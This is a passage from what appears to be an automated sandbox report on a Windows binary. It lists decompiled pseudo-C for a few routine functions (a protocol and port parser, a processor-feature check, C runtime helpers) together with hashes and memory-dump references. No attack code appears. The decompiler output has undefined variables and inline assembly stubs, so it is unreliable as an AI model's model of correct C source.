                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2714421763-0
                                                                                                                                                                    • Opcode ID: 091ab3e0bd5203afd4ee492bf42b5b65759865d43383e0c8449e43beb9290323
                                                                                                                                                                    • Instruction ID: 1e31e2958f1c4eeb18aedd115d668bef2d1fe812235c2296b651c29a94e55e92
                                                                                                                                                                    • Opcode Fuzzy Hash: 091ab3e0bd5203afd4ee492bf42b5b65759865d43383e0c8449e43beb9290323
                                                                                                                                                                    • Instruction Fuzzy Hash: D2016271D01706EADB306BB49C0A7DE7BE6DF50721FE04089F504A6195EF388AC1CB95
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00B11071(void* __edi, intOrPtr* __esi, intOrPtr* _a4) {
                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                    				intOrPtr _t11;
                                                                                                                                                                    				void* _t25;
                                                                                                                                                                    
                                                                                                                                                                    				_t25 = __edi;
                                                                                                                                                                    				if(E00B11C70(__edi, "udp") == 0) {
                                                                                                                                                                    					if(E00B11C70(__edi, "tcp") == 0) {
                                                                                                                                                                    						if(E00B11C70(__edi, "any") == 0) {
                                                                                                                                                                    							goto L9;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							 *__esi = 0x100;
                                                                                                                                                                    							goto L6;
                                                                                                                                                                    						}
                                                                                                                                                                    					} else {
                                                                                                                                                                    						 *__esi = 6;
                                                                                                                                                                    						goto L6;
                                                                                                                                                                    					}
                                                                                                                                                                    				} else {
                                                                                                                                                                    					 *__esi = 0x11;
                                                                                                                                                                    					L6:
                                                                                                                                                                    					if(E00B11C70(_t25, ":") == 0) {
                                                                                                                                                                    						L9:
                                                                                                                                                                    						return 0;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_v8 = _v8 & 0x00000000;
                                                                                                                                                                    						_t11 = E00B11FD7(_t9 + 1,  &_v8, 0xa);
                                                                                                                                                                    						if(_t11 == 0) {
                                                                                                                                                                    							goto L9;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							 *_a4 = _t11;
                                                                                                                                                                    							return 1;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    			}







                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __wcstoui64
                                                                                                                                                                    • String ID: any$tcp$udp
                                                                                                                                                                    • API String ID: 3882282163-1470427579
                                                                                                                                                                    • Opcode ID: 2a0a5bfce2ed033b3894354778965294f198ea69b0d5befc43cb6e90c2104c48
                                                                                                                                                                    • Instruction ID: e774be968f81b70c866a97f377e934a166828d73b4b683590b5481742f3d34ec
                                                                                                                                                                    • Opcode Fuzzy Hash: 2a0a5bfce2ed033b3894354778965294f198ea69b0d5befc43cb6e90c2104c48
                                                                                                                                                                    • Instruction Fuzzy Hash: 78018436A5834266E714AB289C07BF622D8CF06764FA0089DFB41D90C1EFF5D8C09269
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 65%
                                                                                                                                                                    			E00B19110() {
                                                                                                                                                                    				signed long long _v12;
                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                    				signed long long _v28;
                                                                                                                                                                    				signed char _t8;
                                                                                                                                                                    
                                                                                                                                                                    				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                                                                                    				if(_t8 == 0) {
                                                                                                                                                                    					L6:
                                                                                                                                                                    					_v20 =  *0xb1d320;
                                                                                                                                                                    					_v28 =  *0xb1d318;
                                                                                                                                                                    					asm("fsubr qword [ebp-0x18]");
                                                                                                                                                                    					_v12 = _v28 / _v20 * _v20;
                                                                                                                                                                    					asm("fld1");
                                                                                                                                                                    					asm("fcomp qword [ebp-0x8]");
                                                                                                                                                                    					asm("fnstsw ax");
                                                                                                                                                                    					if((_t8 & 0x00000005) != 0) {
                                                                                                                                                                    						return 0;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						return 1;
                                                                                                                                                                    					}
                                                                                                                                                                    				} else {
                                                                                                                                                                    					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                                                                                    					if(__eax == 0) {
                                                                                                                                                                    						goto L6;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_push(0);
                                                                                                                                                                    						return __eax;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    			}








                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,00B184A4), ref: 00B19115
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00B19125
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                    • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                    • API String ID: 1646373207-3105848591
                                                                                                                                                                    • Opcode ID: 867ce9b166959e218e6507b75e17680145a25d67fad39fe4f363c0129542e802
                                                                                                                                                                    • Instruction ID: 63d36f288a0927e719b9c097c3d1a9e43d7ef75d7e067355ad7e786a2cb6e9ba
                                                                                                                                                                    • Opcode Fuzzy Hash: 867ce9b166959e218e6507b75e17680145a25d67fad39fe4f363c0129542e802
                                                                                                                                                                    • Instruction Fuzzy Hash: 13F03030A40A0AE2DF101BA5BC1E6EEBFB9FB84B46FC205D0A191F10D4DF7481F49246
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00B18FFC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                    				intOrPtr _t25;
                                                                                                                                                                    				void* _t26;
                                                                                                                                                                    				void* _t28;
                                                                                                                                                                    
                                                                                                                                                                    				_t25 = _a16;
                                                                                                                                                                    				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                                                                                    					_t26 = E00B188ED(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                    					goto L9;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t34 = _t25 - 0x66;
                                                                                                                                                                    					if(_t25 != 0x66) {
                                                                                                                                                                    						__eflags = _t25 - 0x61;
                                                                                                                                                                    						if(_t25 == 0x61) {
                                                                                                                                                                    							L7:
                                                                                                                                                                    							_t26 = E00B189DD(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                    						} else {
                                                                                                                                                                    							__eflags = _t25 - 0x41;
                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                    								goto L7;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_t26 = E00B18F02(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    						L9:
                                                                                                                                                                    						return _t26;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						return E00B18E47(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    			}







                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                                                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                    • Instruction ID: 244f530c6a52381af98145142a3fcd80778d9e56dd8f8a8c704909be5c423a0d
                                                                                                                                                                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                    • Instruction Fuzzy Hash: 8E114E7200018ABBCF265E94CC55CEE3FA7FB1C350B988595FA1899031C736C9B1AB81
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                    			E00B13060(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                    				void* _t25;
                                                                                                                                                                    				intOrPtr _t28;
                                                                                                                                                                    				void* _t29;
                                                                                                                                                                    				void* _t30;
                                                                                                                                                                    
                                                                                                                                                                    				_t30 = __eflags;
                                                                                                                                                                    				_t26 = __edi;
                                                                                                                                                                    				_t25 = __edx;
                                                                                                                                                                    				_t22 = __ebx;
                                                                                                                                                                    				_push(0xc);
                                                                                                                                                                    				_push(0xb1dcf8);
                                                                                                                                                                    				E00B13F70(__ebx, __edi, __esi);
                                                                                                                                                                    				_t28 = E00B1339D(__ebx, __edi, _t30);
                                                                                                                                                                    				_t13 =  *0xb1f534; // 0xfffffffe
                                                                                                                                                                    				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                                                                                                    					L6:
                                                                                                                                                                    					E00B13C3D(_t22, 0xc);
                                                                                                                                                                    					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                                                                                    					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                                                                                    					_t26 =  *0xb1f618; // 0xb1f540
                                                                                                                                                                    					 *((intOrPtr*)(_t29 - 0x1c)) = E00B13022(_t8, _t25, _t26);
                                                                                                                                                                    					 *(_t29 - 4) = 0xfffffffe;
                                                                                                                                                                    					E00B130CA();
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                                                                    					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                                                                    						goto L6;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t28 =  *((intOrPtr*)(E00B1339D(_t22, _t26, _t32) + 0x6c));
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                    					E00B12033(_t25, _t26, 0x20);
                                                                                                                                                                    				}
                                                                                                                                                                    				return E00B13FB5(_t28);
                                                                                                                                                                    			}









                                                                                                                                                                    APIs
                                                                                                                                                                    • __getptd.LIBCMT ref: 00B1306C
                                                                                                                                                                      • Part of subcall function 00B1339D: __getptd_noexit.LIBCMT ref: 00B133A0
                                                                                                                                                                      • Part of subcall function 00B1339D: __amsg_exit.LIBCMT ref: 00B133AD
                                                                                                                                                                    • __getptd.LIBCMT ref: 00B13083
                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 00B13091
                                                                                                                                                                    • __lock.LIBCMT ref: 00B130A1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3521780317-0
                                                                                                                                                                    • Opcode ID: 7960eca0f79954ed3d0d1189524cf01c0a3daa6f63df8494245885f9ddde0c6b
                                                                                                                                                                    • Instruction ID: 4408a18b3fbcf413dde814621a9d83a34070dcc66352fb0fd9fbc17009300b90
                                                                                                                                                                    • Opcode Fuzzy Hash: 7960eca0f79954ed3d0d1189524cf01c0a3daa6f63df8494245885f9ddde0c6b
                                                                                                                                                                    • Instruction Fuzzy Hash: 1AF01D32940700CAD720AB74940E7DD73E0AF04F11FD045D9A4A4972D6EB745BC1CB95
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%